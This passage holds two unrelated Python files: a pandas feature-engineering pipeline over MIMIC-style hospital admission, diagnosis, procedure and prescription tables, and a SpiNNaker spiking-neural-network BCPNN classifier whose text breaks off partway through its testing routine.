    inpat_visit = pd.pivot_table(inpat_visit, values='hadm_id', index='subject_id', columns='visit_year',aggfunc=np.sum,fill_value=0).reset_index()
    colnames = list('TotalVisits_'+ inpat_visit.columns[1:].astype(str))
    inpat_visit.columns = inpat_visit.columns[:1].tolist() + colnames
    ##compute the diagnosis summaries
    print("\nFeature Creation: Diagosis summary per diagnosis")
    inpat_diagnosis = pd.DataFrame(columns=['subject_id'])
    for com in MASTER_icd9.Diagnosis.unique():
        inpat_diagnosis_temp = diagnosis_summary(diagnosis,com,MASTER_icd9)
        inpat_diagnosis = inpat_diagnosis.merge(inpat_diagnosis_temp,on='subject_id',how='outer')
    ## Length of stay
    print("\nFeature Creation: Length of stay in each year")
    admission['length_of_stay'] = (admission.dischtime - admission.admittime).dt.days + 1
    inpat_los = admission.groupby(['subject_id','visit_year']).agg({'length_of_stay':'sum'}).reset_index()
    inpat_los = pd.pivot_table(inpat_los, values='length_of_stay', index='subject_id', columns='visit_year', aggfunc=np.sum,fill_value=0).reset_index()
    colnames = list('los_'+ inpat_los.columns[1:].astype(str))
    inpat_los.columns = inpat_los.columns[:1].tolist() + colnames
    ## If there's a new ICD9 code in the last visit ##
    print("\nFeature Creation: New diagnosis in last visit")
    #keep patients with more than 1 visit
    inpat_last = admission[['subject_id','hadm_id','admittime']].groupby('subject_id').filter(lambda x: len(x) > 1)
    ## For last visit ##
    inpat_last = inpat_last.sort_values('admittime',ascending=False).reset_index(drop=True)
    #last admission
    inpat_last_adm = inpat_last.drop_duplicates(subset='subject_id',keep='first')
    #all but last admission
    inpat_all_but_last_adm = inpat_last.loc[~inpat_last.hadm_id.isin(inpat_last_adm.hadm_id),]
    #last admission diagnosis
    inpat_last_diag = diagnosis.loc[diagnosis.hadm_id.isin(inpat_last_adm.hadm_id),['subject_id','icd9_code']]
    #all but last admission diagnosis
    inpat_all_but_last_diag = diagnosis.loc[diagnosis.hadm_id.isin(inpat_all_but_last_adm.hadm_id),['subject_id','icd9_code']]
    #define function to find new diagnosis in last visit
    def new_diag_last_adm(subject_id):
        # Concatenating the earlier diagnoses *twice* guarantees every one
        # of their rows is a duplicate, so drop_duplicates(keep=False)
        # leaves only codes that appear exclusively in the last visit.
        last_diag = inpat_last_diag.loc[inpat_last_diag.subject_id==subject_id,]
        all_but_last_diag = inpat_all_but_last_diag.loc[inpat_all_but_last_diag.subject_id==subject_id,]
        last_new = pd.concat([last_diag,all_but_last_diag,all_but_last_diag]).drop_duplicates(keep=False)
        return(last_new)
    #call function for each patient
    inpat_last_new = pd.DataFrame()
    for subj in inpat_last_diag.subject_id.unique():
        inpat_last_new_temp = new_diag_last_adm(subj)
        inpat_last_new = pd.concat([inpat_last_new, inpat_last_new_temp])
    #match ICD9 codes with the names, for unatched fill as OTHERS
    inpat_last_new = pd.merge(inpat_last_new, MASTER_icd9, left_on='icd9_code', right_on='ICD9', how='left').fillna('OTHERS')
    # Use the axis keyword (positional axis was removed in pandas 2.x).
    inpat_last_new = inpat_last_new.drop('ICD9', axis=1)
    #rename new diagnosis in last visit columns
    inpat_last_new.Diagnosis = 'NewICD9LastVisit_' + inpat_last_new.Diagnosis
    #pivot data in the required format
    inpat_last_new = pd.pivot_table(inpat_last_new, values='icd9_code', index='subject_id', columns='Diagnosis', aggfunc=np.size,fill_value=0).reset_index()
    ### merging all the features created
    # BUG FIX: the original merged inpat_totcom with *itself* (producing
    # TotalComorb_x/TotalComorb_y) and never merged inpat_com, although
    # ComorFirstVisit is computed above; merge inpat_com instead.
    inpat_final = inpat_totcom.merge(inpat_com, on='subject_id', how='outer').merge(inpat_totcom_yr, on='subject_id', how='outer').merge(inpat_proc, on='subject_id', how='outer').merge(inpat_totproc, on='subject_id', how='outer').merge(inpat_visit, on='subject_id', how='outer').merge(inpat_diagnosis, on='subject_id', how='outer').merge(inpat_los,on='subject_id',how='outer').merge(inpat_last_new,on='subject_id',how='outer')
    ##add inpatient flag
    inpat_final['io_flag'] = 'in'
    # Procedures processing
    print("\nFeature Creation: Procedure related features")
    #merge with admissions for relevant hadm_id
    proc = pd.merge(procedures, admission[['hadm_id','admittime','dischtime','visit_year']])
    proc['visit_year'] = proc.visit_year.astype(str)
    #consider procedures carried out in 2008, 2009 & 2010 only
    proc = proc.loc[proc.visit_year.isin(['2008','2009','2010']),]
    #add the reporting summary & reporting label details
    proc_report_details = execute_sql('select * from mimic_d_icd9_proc_reference')
    proc = pd.merge(proc, proc_report_details[['icd9_proc', 'icd9_proc_report_summ', 'icd9_proc_report_label']], left_on='icd9_procedure', right_on='icd9_proc')
    #pivoting dataset in the required format
    proc_final = pd.pivot_table(proc, values='icd9_procedure', index='subject_id', columns=['visit_year', 'icd9_proc_report_summ', 'icd9_proc_report_label'], aggfunc=np.size,fill_value=0)
    #flatten multiindex column names
    proc_final.columns = ['_'.join(col).strip() for col in proc_final.columns]
    proc_final = proc_final.reset_index()
    #### meging with inpatient set above
    inpat_final = pd.merge(inpat_final,proc_final, on='subject_id', how='left')
    return(inpat_final)
#%% derived features based on features summary
def derived_summary_features(inpat_final):
    """Add per-year comorbidity totals and per-condition share features.

    For each of the 14 chronic conditions this appends, from the existing
    ``<COND>_Count_<year>`` columns (years 2008-2010):
      * ``<COND>_Prc_Dstrb_<year>``  - share of that year's comorbidity total
      * ``<COND>_Count_2008_2009``   - two-year count
      * ``<COND>_Prc_2008_2009``     - two-year share of Total_Comorb_14_0809
      * ``<COND>_Count_2008_2010``   - three-year count
      * ``<COND>_Prc_2008_2010``     - three-year share of Total_Comorb_14
    plus the totals ``NoOfCom_14_<year>``, ``Total_Comorb_14`` and
    ``Total_Comorb_14_0809``.

    Parameters
    ----------
    inpat_final : pandas.DataFrame
        Must contain a ``<COND>_Count_<year>`` column for every
        condition/year pair.

    Returns
    -------
    pandas.DataFrame
        The same frame with the derived columns appended.
    """
    print("\nFeature Creation: Summarised features")
    # The 14 chronic conditions tracked by the *_Count_* columns; the
    # original code repeated the identical recipe once per condition.
    conditions = ["ALZHDMTA", "CHF", "CHRNKIDN", "COPD", "DEPRESSN",
                  "DIABETES", "ISCHMCHT", "OSTEOPRS", "RA_OA", "STRKETIA",
                  "CNCR_BRST", "CNCR_COLR", "CNCR_PROS", "CNCR_LUNG"]
    years = ["2008", "2009", "2010"]
    # Yearly totals across the 14 conditions
    for yr in years:
        count_cols = ["%s_Count_%s" % (c, yr) for c in conditions]
        inpat_final['NoOfCom_14_%s' % yr] = inpat_final[count_cols].sum(axis=1)
    inpat_final['Total_Comorb_14'] = inpat_final[["NoOfCom_14_2008", "NoOfCom_14_2009", "NoOfCom_14_2010"]].sum(axis=1)
    inpat_final['Total_Comorb_14_0809'] = inpat_final[["NoOfCom_14_2008", "NoOfCom_14_2009"]].sum(axis=1)
    # Per-condition distribution and cumulative share features
    for c in conditions:
        for yr in years:
            # share of that year's total comorbidity count
            inpat_final['%s_Prc_Dstrb_%s' % (c, yr)] = inpat_final['%s_Count_%s' % (c, yr)] / inpat_final['NoOfCom_14_%s' % yr]
        inpat_final['%s_Count_2008_2009' % c] = inpat_final[['%s_Count_2008' % c, '%s_Count_2009' % c]].sum(axis=1)
        inpat_final['%s_Prc_2008_2009' % c] = inpat_final['%s_Count_2008_2009' % c] / inpat_final.Total_Comorb_14_0809
        inpat_final['%s_Count_2008_2010' % c] = inpat_final[['%s_Count_2008' % c, '%s_Count_2009' % c, '%s_Count_2010' % c]].sum(axis=1)
        inpat_final['%s_Prc_2008_2010' % c] = inpat_final['%s_Count_2008_2010' % c] / inpat_final.Total_Comorb_14
    return(inpat_final)
#%% add labels to the columns required (note: for diagnosis it adds ccs label)
def labels_for_neighbor_features(df, col):
    """Attach a human-readable label column for the codes found in *df[col]*.

    Values in *col* are prefixed code ids ("IDX_<icd9>", "N_<ndc>" or
    "L_<loinc>").  Each family is resolved against its own reference
    (the in-memory ``hcup_df`` for diagnoses; the NDC and LOINC tables via
    ``execute_sql`` for drugs and labs) and merged back as ``<col>_label``.

    Relies on the module-level ``hcup_df`` frame and ``execute_sql`` helper.
    """
    # Split the code ids into the three families by their prefix
    idx_list = []
    ndc_list = []
    lab_list = []
    for i, row in df.iterrows():
        prefix = row[col].split('_')[0]
        if prefix == 'IDX':
            idx_list.append(row[col])
        elif prefix == 'N':
            ndc_list.append(row[col])
        elif prefix == 'L':
            lab_list.append(row[col])
    # initialize empty dataframes so the final concat works for absent families
    idx_df = pd.DataFrame()
    ndc_df = pd.DataFrame()
    lab_df = pd.DataFrame()
    if len(idx_list) > 0:
        # get labels for diagnosis(IDX) from the in-memory hcup reference
        idx_list = pd.DataFrame(idx_list, columns=['code_id'])
        idx_list['code'] = idx_list['code_id'].str.split('_').str[1]
        idx_list = idx_list.drop_duplicates()
        idx_df = pd.merge(idx_list, hcup_df[['icd9_std', 'hcup_label']], how='left', left_on='code', right_on='icd9_std')
        # bug fix: use the axis keyword - positional axis for drop was
        # removed in pandas 2.0
        idx_df = idx_df.drop('icd9_std', axis=1)
        idx_df.columns = ['code_id', 'code', 'label']
    if len(ndc_list) > 0:
        # get labels for drugs(NDC)
        ndc_list = pd.DataFrame(ndc_list, columns=['code_id'])
        ndc_list['code'] = ndc_list['code_id'].str.split('_').str[1]
        ndc_list = ndc_list.drop_duplicates()
        # NOTE(review): codes are interpolated straight into the SQL string;
        # acceptable for trusted reference codes, unsafe for untrusted input
        ndc_sql_list = str(list(ndc_list.code)).strip('[]')
        ndc_db = execute_sql("select ndc as code, pref_label as label from d_ndc_codes where ndc in (%s)" %(ndc_sql_list))
        ndc_df = pd.merge(ndc_list, ndc_db, how='left', on='code')
    if len(lab_list) > 0:
        # get labels for labs(LAB / LOINC)
        lab_list = pd.DataFrame(lab_list, columns=['code_id'])
        lab_list['code'] = lab_list['code_id'].str.split('_').str[1]
        lab_list = lab_list.drop_duplicates()
        lab_sql_list = str(list(lab_list.code)).strip('[]')
        lab_db = execute_sql("select loinc_code as code, loinc_label as label from d_loinc_codes where loinc_code in (%s)" %(lab_sql_list))
        # a LOINC code can appear several times in the reference - keep one
        lab_db = lab_db.drop_duplicates(subset='code')
        lab_df = pd.merge(lab_list, lab_db, how='left', on='code')
    # append all families to get the full label lookup table
    label_df = pd.concat([idx_df, ndc_df, lab_df])
    label_df = label_df.drop('code', axis=1)
    label_df.columns = [col, col + '_label']
    # merge the labels back onto the original dataset
    df = pd.merge(df, label_df, how='left', on=col)
    return(df)
#%% Neighbor Features Creation
def neighbor_features(patient_id=None):
    """Build the per-patient neighbor features from the dashbd_final table.

    Parameters
    ----------
    patient_id : list or None
        Optional list of patient ids to restrict the query to; all patients
        are included when None.

    Returns
    -------
    pandas.DataFrame
        One row per subject_id, one column per neighbor feature; values are
        the neighbor scores (0 where absent).
    """
    if patient_id:
        patient_id = str(patient_id).strip('[]')
        dashbd = execute_sql("select patient_id, pair_l1, pair_l2, neighbor_code, neighbor_pref_name, score from dashbd_final where patient_id in (%s)" %(patient_id))
    else:
        # bug fix: query previously read "select select ...", invalid SQL
        dashbd = execute_sql("select patient_id, pair_l1, pair_l2, neighbor_code, neighbor_pref_name, score from dashbd_final")
    # bug fix: top_n is not among the selected columns, so dropping it
    # unconditionally raised KeyError; ignore it when absent
    dashbd = dashbd.drop(['top_n'], axis=1, errors='ignore')
    dashbd = dashbd.drop_duplicates()
    # extract top 50 (by score) for every patient
    dashbd = dashbd.sort_values(['score'], ascending=False)
    dashbd = dashbd.groupby('patient_id').apply(lambda x: x.head(50)).reset_index(drop=True)
    # add labels for the pair columns (ccs label for diagnoses)
    dashbd = labels_for_neighbor_features(dashbd, 'pair_l1')
    dashbd = labels_for_neighbor_features(dashbd, 'pair_l2')
    # compose the feature name from both pair labels and the neighbor name
    dashbd['feature'] = dashbd['pair_l1_label'] + '_' + dashbd['pair_l2_label'] + '_' + dashbd['neighbor_pref_name']
    dashbd['feature'] = dashbd['feature'].fillna('NOTFOUND')
    # pivot data to get one row per patient
    dashbd_nf = pd.pivot_table(dashbd, values='score', index='patient_id', columns='feature', aggfunc='last', fill_value=0).reset_index()
    # rename to match the subject_id key used by the rest of the pipeline
    dashbd_nf.rename(columns={'patient_id':'subject_id'}, inplace=True)
    return(dashbd_nf)
#%%# main function
if __name__ == "__main__":
    print("\nExtracting the admissions, diagnoses & procedures dataset...")
    # admission dataset
    admission = execute_sql("select * from mimic_admissions_shftd")
    # remove records with NA in dischtime
    admission = admission.dropna(subset=['dischtime'])
    # add visit_year column
    admission['visit_year'] = admission['admittime'].dt.year
    # diagnosis dataset (joined to the icd9 reference for titles/std codes)
    diagnosis = execute_sql("select a.*, b.long_title, b.icd9_std from mimic_diagnoses a, d_icd9_diagnoses b where a.icd9_code = b.icd9_code")
    # procedures dataset
    procedures = execute_sql('select a.*, b.long_title from mimic_procedures a, mimic_d_icd_procedures b where a.icd9_procedure = b.icd9_procedure')
    # master_icd9 reference
    MASTER_icd9 = master_icd9()
    # feature creation
    inpat_features = feature_creation(admission, diagnosis, procedures, MASTER_icd9)
    # calculating & adding summarised features
    mimic_summary = derived_summary_features(inpat_features)
    # hcup dataset and processing
    hcup = execute_sql('select icd9_code, long_title, icd9_std, ccs_lvl_1_label, ccs_lvl_2_label, ccs_lvl_3_label, ccs_lvl_4_label from d_icd9_diagnoses') #(01/24/18) icd9code '388' was present in mimic_d_icd_diagnoses & not in d_icd9_diagnoses
    # melt the four ccs level label columns into rows, one per level
    hcup_melt = pd.melt(hcup, id_vars=['icd9_code', 'long_title', 'icd9_std'], var_name='col_name')
    hcup_melt = hcup_melt.loc[hcup_melt['value']!=' ',]
    hcup_melt['level_id'] = hcup_melt['col_name'].str.split('_').str[2]
    hcup_melt = hcup_melt.sort_values(['icd9_code','icd9_std','level_id'], ascending=[True,True,False])
    # keep only the deepest available ccs level per icd9 code
    hcup_df = hcup_melt.groupby(by=['icd9_code', 'icd9_std']).apply(lambda g: g[g['level_id'] == g['level_id'].max()]).reset_index(drop=True)
    # bug fix: use the axis keyword - positional axis for drop was removed in pandas 2.0
    hcup_df = hcup_df.drop(['level_id', 'col_name'], axis=1)
    # rename column as hcup_label
    hcup_df.rename(columns={'value':'hcup_label'}, inplace=True)
    # configure icd9 code for the match
    hcup_df = configure_icd9_codes(hcup_df, 'icd9_std', 'icd9_to_compare')
    # the new drug features (added on 01/08/2018)
    pres = execute_sql("select * from mimic_prescriptions where drug_type='MAIN' and ndc<>'0'")
    pres_unique = pres[['drug']].drop_duplicates()
    inpat_pres = pd.DataFrame(columns=['subject_id'])
    # NOTE(review): only the first 10 unique drugs are processed - looks like
    # a debugging limit; confirm before running on the full drug list
    for i, row in pres_unique[:10].iterrows():
        pres_data = pres.loc[pres.drug == row.drug,]
        adm_data = admission.loc[admission.hadm_id.isin(pres_data.hadm_id),]
        inpat_pres_temp = drug_summary(pres_data, row.drug, adm_data, hcup_df)
        inpat_pres = inpat_pres.merge(inpat_pres_temp,on='subject_id',how='outer')
    # merging with summary dataset above
    mimic_summary = pd.merge(mimic_summary, inpat_pres, on='subject_id', how='left')
    # the new neighbor feature, for specific patients add list, else leave empty
    mimic_neighbor = neighbor_features()
    # merging with the summary
    mimic_summary = pd.merge(mimic_summary, mimic_neighbor, on='subject_id', how='left')
    # write output to a spreadsheet
    print("\nGenerating the spreadsheet - mimic_all_patients.xlsx")
    writer = pd.ExcelWriter("mimic_all_patients.xlsx", engine='xlsxwriter')
    mimic_summary.to_excel(writer, sheet_name='mimic_all_patients')
    # bug fix: ExcelWriter.save() was removed in pandas 2.0; close() also
    # saves the workbook and works on older versions too
    writer.close()
|
import itertools
import logging
import numpy
import pylab
# Import simulator
import pynn_spinnaker as sim
import pynn_spinnaker_bcpnn as bcpnn
from copy import deepcopy
logger = logging.getLogger("pynn_spinnaker")
logger.setLevel(logging.INFO)
logger.addHandler(logging.StreamHandler())
#-------------------------------------------------------------------
# General Parameters
#-------------------------------------------------------------------
# Network dimensions
INPUT_NAMES = ["X", "Y"]
CLASS_NAMES = ["X'", "Y'"]
# Neurons per input/class population
CLASS_POP_SIZE = 30
# NOTE(review): not referenced anywhere in this file - confirm external use
WEIGHT_GAIN = 6.0
# Weight of connection between stimuli input and class and input populations
PRE_STIMULI_WEIGHT = 2.0
POST_STIMULI_WEIGHT = 2.0
# Firing frequency that corresponds to certainty
MAX_FREQUENCY = 20.0 # Hz
MIN_FREQUENCY = 0.001 # Hz - near-silent "off" stimulus
#-------------------------------------------------------------------
# Training parameters
#-------------------------------------------------------------------
# Experiment configuration
TRAINING_TIME = 20 * 1000 # ms of training simulation
TRAINING_STIMULUS_TIME = 100 # ms per training stimulus block
BCPNN_TAU_PRIMARY = 10.0       # ms
BCPNN_TAU_ELIGIBILITY = 1000.0 # ms
BCPNN_PHI = 0.045              # nA
# Maximum weight multiplied by Wij value calculated by BCPNN rule
BCPNN_MAX_WEIGHT = 0.012 # uS for conductance
#-------------------------------------------------------------------
# Testing parameters
#-------------------------------------------------------------------
TESTING_STIMULUS_TIME = 5000 # ms per testing stimulus block
TESTING_TIME = 4 * TESTING_STIMULUS_TIME # four stimulus blocks in total
# LIF cell parameters shared by the input and class populations
cell_params = {
    'cm'        : 0.25, # nF
    'tau_m'     : 20.0,
    'tau_refrac': 2.0,
    'tau_syn_E' : 5.0,
    'tau_syn_I' : 5.0,
    'v_reset'   : -70.0,
    'v_rest'    : -70.0,
    'v_thresh'  : -55.0
}
#-------------------------------------------------------------------
# Generate poisson noise of given rate between start and stop times
#-------------------------------------------------------------------
def poisson_generator(rate, t_start, t_stop):
    """Generate a Poisson spike train.

    Parameters
    ----------
    rate : float
        Mean firing rate in Hz; a rate <= 0 yields no spikes.
    t_start, t_stop : float
        Interval (ms) over which spikes are generated.

    Returns
    -------
    list
        Ascending spike times in ms, rounded to millisecond boundaries.
    """
    # bug fix: a non-positive rate used to raise ZeroDivisionError below
    if rate <= 0.0:
        return []
    # Expected number of spikes, padded with 3-sigma head room
    n = (t_stop - t_start) / 1000.0 * rate
    number = numpy.ceil(n + 3 * numpy.sqrt(n))
    if number < 100:
        number = min(5 + numpy.ceil(2 * n), 100)
    # bug fix: numpy requires an integer sample count (ceil returns a float)
    number = int(number)
    if number > 0:
        # Draw inter-spike intervals (seconds) and convert to ms
        isi = numpy.random.exponential(1.0 / rate, number) * 1000.0
        if number > 1:
            spikes = numpy.add.accumulate(isi)
        else:
            spikes = isi
    else:
        spikes = numpy.array([])
    spikes += t_start
    i = numpy.searchsorted(spikes, t_stop)
    extra_spikes = []
    if len(spikes) == i:
        # ISI buffer overrun - keep drawing until we pass t_stop
        t_last = spikes[-1] + numpy.random.exponential(1.0 / rate, 1)[0] * 1000.0
        while (t_last < t_stop):
            extra_spikes.append(t_last)
            t_last += numpy.random.exponential(1.0 / rate, 1)[0] * 1000.0
        spikes = numpy.concatenate((spikes, extra_spikes))
    else:
        # Discard the draws that overshot t_stop
        spikes = numpy.resize(spikes, (i,))
    # Return spike times, rounded to millisecond boundaries
    return [round(x) for x in spikes]
#-------------------------------------------------------------------
# Convert weights in format returned by getWeights into a connection list
# **NOTE** this requires signed weight support
#-------------------------------------------------------------------
def convert_weights_to_list(matrix, delay, weight_scale=1.0):
    """Convert a pre x post weight matrix into a FromListConnector-style list.

    Parameters
    ----------
    matrix : numpy.ndarray
        Weight matrix where nan entries mark absent connections.
    delay : float
        Delay (ms) applied to every connection.
    weight_scale : float
        Multiplier applied to each weight.

    Returns
    -------
    list of (pre_index, post_index, weight, delay) tuples.
    """
    def build_list(indices):
        # Extract weights from matrix using indices
        weights = matrix[indices]
        # Scale weights
        weights = numpy.multiply(weights, weight_scale)
        # Build numpy array of delays
        delays = numpy.repeat(delay, len(weights))
        # Zip x-y coordinates of connected weights with weights and delays.
        # bug fix: materialise the zip - under Python 3 it is a single-use
        # iterator, which breaks callers that re-iterate the connection list
        return list(zip(indices[0], indices[1], weights, delays))
    # Get indices of non-nan i.e. connected weights
    connected_indices = numpy.where(~numpy.isnan(matrix))
    # Return connection lists
    return build_list(connected_indices)
#-------------------------------------------------------------------
# Convert list of stimuli rates and a duration into blocks of
# Poisson noise in format to load into spike source array
#-------------------------------------------------------------------
def generate_stimuli_spike_times(stimuli_rates, stimuli_duration, population_size):
    """Build one spike train per neuron: a Poisson block for each stimulus
    rate, laid out back-to-back in time (block i covers
    [i * stimuli_duration, (i + 1) * stimuli_duration))."""
    population_spike_times = []
    for neuron_index in range(population_size):
        # Concatenate a Poisson block for every stimulus in sequence
        spike_train = []
        for block_index, block_rate in enumerate(stimuli_rates):
            block_start = block_index * stimuli_duration
            spike_train.extend(poisson_generator(block_rate, block_start,
                                                 block_start + stimuli_duration))
        population_spike_times.append(spike_train)
    return population_spike_times
def create_input_population(size, name, record, sim):
    """Create an IF_curr_exp input population named *name*, optionally
    recording its spikes."""
    population = sim.Population(size, sim.IF_curr_exp(**cell_params), label=name)
    if not record:
        return population
    # **YUCK** record spikes actually entirely ignores
    # sampling interval but throws exception if it is not set
    population.record("spikes", sampling_interval=100.0)
    return population
def create_class_population(size, name, record, ioffset, train, sim):
    """Create a class population of BCPNN IF_curr_exp cells.

    Starts from the shared cell_params with bias learning disabled,
    plasticity controlled by *train* and offset current *ioffset*.
    """
    class_params = deepcopy(cell_params)
    class_params.update({
        "bias_enabled": False,
        "plasticity_enabled": train,
        "i_offset": ioffset,
    })
    population = sim.Population(size, bcpnn.IF_curr_exp(**class_params), label=name)
    if record:
        # **YUCK** record spikes actually entirely ignores
        # sampling interval but throws exception if it is not set
        population.record("spikes", sampling_interval=100.0)
    if train:
        population.record("bias", sampling_interval=100.0)
    return population
#-------------------------------------------------------------------
# Build basic classifier network
#-------------------------------------------------------------------
def build_basic_network(input_stimuli_rates, input_stimuli_duration,
                        class_stimuli_rates, class_stimuli_duration,
                        record, ioffset, train, sim):
    """Build the input and class populations plus their stimulus sources.

    Parameters
    ----------
    input_stimuli_rates / class_stimuli_rates : list of list of float
        Per-population sequences of Poisson rates (Hz), one entry per block.
    input_stimuli_duration / class_stimuli_duration : float
        Duration (ms) of each stimulus block.
    record : bool
        Whether the populations record spikes.
    ioffset : float or list of float
        Offset current for the class populations; a list supplies one value
        per class population.
    train : bool
        Enables plasticity (and bias recording) in the class populations.
    sim : module
        PyNN simulator backend to build against.

    Returns
    -------
    (input_populations, class_populations) tuple of lists.
    """
    # Create main input and class populations
    input_populations = [create_input_population(CLASS_POP_SIZE, i, record, sim) for i in INPUT_NAMES]
    if isinstance(ioffset, list):
        class_populations = [create_class_population(CLASS_POP_SIZE, c, record, o, train, sim) for i, (o, c) in enumerate(zip(ioffset, CLASS_NAMES))]
    else:
        # bug fix: Python 2-only "print ioffset" statement replaced with the
        # function form, which behaves identically for a single argument
        print(ioffset)
        class_populations = [create_class_population(CLASS_POP_SIZE, c, record, ioffset, train, sim) for c in CLASS_NAMES]
    # Create pre-synaptic stimuli populations
    pre_stimuli_connector = sim.OneToOneConnector()
    pre_stimuli_synapse = sim.StaticSynapse(weight=PRE_STIMULI_WEIGHT)
    for i, (rate, input_pop) in enumerate(zip(input_stimuli_rates, input_populations)):
        # Convert stimuli into spike times
        spike_times = generate_stimuli_spike_times(rate, input_stimuli_duration, CLASS_POP_SIZE)
        # Build spike source array with these times
        stim_pop = sim.Population(CLASS_POP_SIZE, sim.SpikeSourceArray(spike_times=spike_times),
                                  label="pre_stimuli_%u" % i)
        # Connect spike source to input
        sim.Projection(stim_pop, input_pop, pre_stimuli_connector, pre_stimuli_synapse, receptor_type="excitatory",
                       label="%s-%s" % (stim_pop.label, input_pop.label))
    # Create training spike source array populations
    post_stimuli_connector = sim.OneToOneConnector()
    post_stimuli_synapse = sim.StaticSynapse(weight=POST_STIMULI_WEIGHT)
    for i, (rate, class_pop) in enumerate(zip(class_stimuli_rates, class_populations)):
        # Convert stimuli into spike times
        spike_times = generate_stimuli_spike_times(rate, class_stimuli_duration, CLASS_POP_SIZE)
        # Build spike source array with these times.
        # consistency fix: use the modern cell-instance form like the
        # pre-stimuli population above (was the legacy class + dict form)
        stim_pop = sim.Population(CLASS_POP_SIZE, sim.SpikeSourceArray(spike_times=spike_times),
                                  label="post_stimuli_%u" % i)
        # Connect spike source to class population
        sim.Projection(stim_pop, class_pop, post_stimuli_connector, post_stimuli_synapse, receptor_type="excitatory",
                       label="%s-%s" % (stim_pop.label, class_pop.label))
    # Return created populations
    return input_populations, class_populations
#-------------------------------------------------------------------
# Train network and return weights
#-------------------------------------------------------------------
def train():
    """Train the classifier with orthogonal stimuli.

    Returns
    -------
    (learnt_weights, learnt_biases)
        learnt_weights : list of weight matrices, one per input->class
        projection; learnt_biases : list of final bias rows, one per
        class population.
    """
    # SpiNNaker setup
    sim.setup(timestep=1.0, min_delay=1.0, max_delay=10.0, spinnaker_hostname="192.168.1.1")
    # Generate orthogonal input stimuli: rates alternate between the two
    # inputs on successive TRAINING_STIMULUS_TIME blocks
    orthogonal_stimuli_rates = []
    num_inputs = len(INPUT_NAMES)
    for i in range(num_inputs):
        input_stimuli = []
        # bug fix: floor division so range() receives an int under Python 3
        for s in range(TRAINING_TIME // TRAINING_STIMULUS_TIME):
            input_stimuli.append(MIN_FREQUENCY if (s % num_inputs) == i else MAX_FREQUENCY)
        orthogonal_stimuli_rates.append(input_stimuli)
    # Build basic network with orthogonal stimulation of both populations
    input_populations, class_populations = build_basic_network(orthogonal_stimuli_rates, TRAINING_STIMULUS_TIME,
                                                               orthogonal_stimuli_rates, TRAINING_STIMULUS_TIME,
                                                               False, 0.0, True, sim)
    # Create BCPNN model with weights disabled (learning only)
    bcpnn_synapse = bcpnn.BCPNNSynapse(
        tau_zi=BCPNN_TAU_PRIMARY,
        tau_zj=BCPNN_TAU_PRIMARY,
        tau_p=BCPNN_TAU_ELIGIBILITY,
        f_max=MAX_FREQUENCY,
        w_max=BCPNN_MAX_WEIGHT,
        weights_enabled=False,
        plasticity_enabled=True,
        weight=0.0)
    # Create all-to-all connector to connect inputs to classes
    input_class_connector = sim.AllToAllConnector()
    # Loop through all pairs of input populations and classes
    plastic_connections = []
    for (i, c) in itertools.product(input_populations, class_populations):
        # Connect input to class with all-to-all plastic synapse
        connection = sim.Projection(i, c, input_class_connector, bcpnn_synapse,
                                    receptor_type="excitatory", label="%s-%s" % (i.label, c.label))
        plastic_connections.append(connection)
    # Run simulation
    sim.run(TRAINING_TIME)
    # Plot bias evolution
    num_classes = len(CLASS_NAMES)
    #bias_figure, bias_axes = pylab.subplots()
    # **HACK** Extract learnt biases from gsyn channel
    learnt_biases = []
    # only used by the commented-out bias plotting below
    plotting_times = range(TRAINING_TIME)
    for i, c in enumerate(class_populations):
        # Read bias from class
        bias = c.get_data().segments[0].filter(name="bias")[0]
        '''
        # Loop through plotting times to get mean biases
        mean_pj = []
        for t in plotting_times:
            # Slice out the rows for all neurons at this time
            time_rows = gsyn[t::TRAINING_TIME]
            time_bias = zip(*time_rows)[2]
            mean_pj.append(numpy.average(numpy.exp(numpy.divide(time_bias,BCPNN_PHI))))
        bias_axes.plot(plotting_times, mean_pj, label=c.label)
        '''
        # Add final bias column to list
        # **HACK** investigate where out by 1000 comes from!
        learnt_biases.append(bias[-1,:] * 0.001)
    '''
    bias_axes.set_title("Mean final bias")
    bias_axes.set_ylim((0.0, 1.0))
    bias_axes.set_ylabel("Pj")
    bias_axes.set_xlabel("Time/ms")
    bias_axes.legend()
    '''
    # Plot weights
    weight_figure, weight_axes = pylab.subplots(num_inputs, num_classes)
    # Loop through plastic connections
    learnt_weights = []
    for i, c in enumerate(plastic_connections):
        # Extract weights and calculate mean
        weights = c.get("weight", format="array")
        mean_weight = numpy.average(weights)
        # Add weights to list
        learnt_weights.append(weights)
        # Plot mean weight in each panel.
        # bug fix: floor division - a float index would raise under Python 3
        axis = weight_axes[i % num_inputs][i // num_classes]
        axis.matshow([[mean_weight]], cmap=pylab.cm.gray)
        #axis.set_title("%s: %fuS" % (c.label, mean_weight))
        axis.set_title("%u->%u: %f" % (i % num_inputs, i // num_classes, mean_weight))
        axis.get_xaxis().set_visible(False)
        axis.get_yaxis().set_visible(False)
    # Show figures
    pylab.show()
    # End simulation on SpiNNaker
    sim.end()
    # Return learnt weights
    return learnt_weights, learnt_biases
#-------------------------------------------------------------------
# Test trained network
#-------------------------------------------------------------------
def test(learnt_weights, learnt_biases):
    """Run the testing phase.

    Fixed stimulus patterns drive the inputs while the class populations
    start from the learnt biases and receive static learnt weights.
    Returns (input_data, class_data) - recorded data per population.
    """
    # SpiNNaker setup
    sim.setup(timestep=1.0, min_delay=1.0, max_delay=10.0, spinnaker_hostname="192.168.1.1")
    # Four testing blocks per input: X alone, Y alone, both, neither
    testing_stimuli_rates = [
        [MAX_FREQUENCY, MIN_FREQUENCY, MAX_FREQUENCY, MIN_FREQUENCY],
        [MIN_FREQUENCY, MAX_FREQUENCY, MAX_FREQUENCY, MIN_FREQUENCY],
    ]
    # Both classes receive the same uncertain (half-rate) stimulus throughout
    uncertain_stimuli_rates = [
        [MAX_FREQUENCY * 0.5],
        [MAX_FREQUENCY * 0.5],
    ]
    # Build basic network: recording on, biases seeded, plasticity off
    input_populations, class_populations = build_basic_network(testing_stimuli_rates, TESTING_STIMULUS_TIME,
                                                               uncertain_stimuli_rates, TESTING_TIME,
                                                               True, learnt_biases, False, sim)
    # Static BCPNN synapse: weights enabled, no further plasticity
    bcpnn_synapse = bcpnn.BCPNNSynapse(
        tau_zi=BCPNN_TAU_PRIMARY,
        tau_zj=BCPNN_TAU_PRIMARY,
        tau_p=BCPNN_TAU_ELIGIBILITY,
        f_max=MAX_FREQUENCY,
        w_max=BCPNN_MAX_WEIGHT,
        weights_enabled=True,
        plasticity_enabled=False)
    for ((pre_pop, post_pop), weight_matrix) in zip(itertools.product(input_populations, class_populations), learnt_weights):
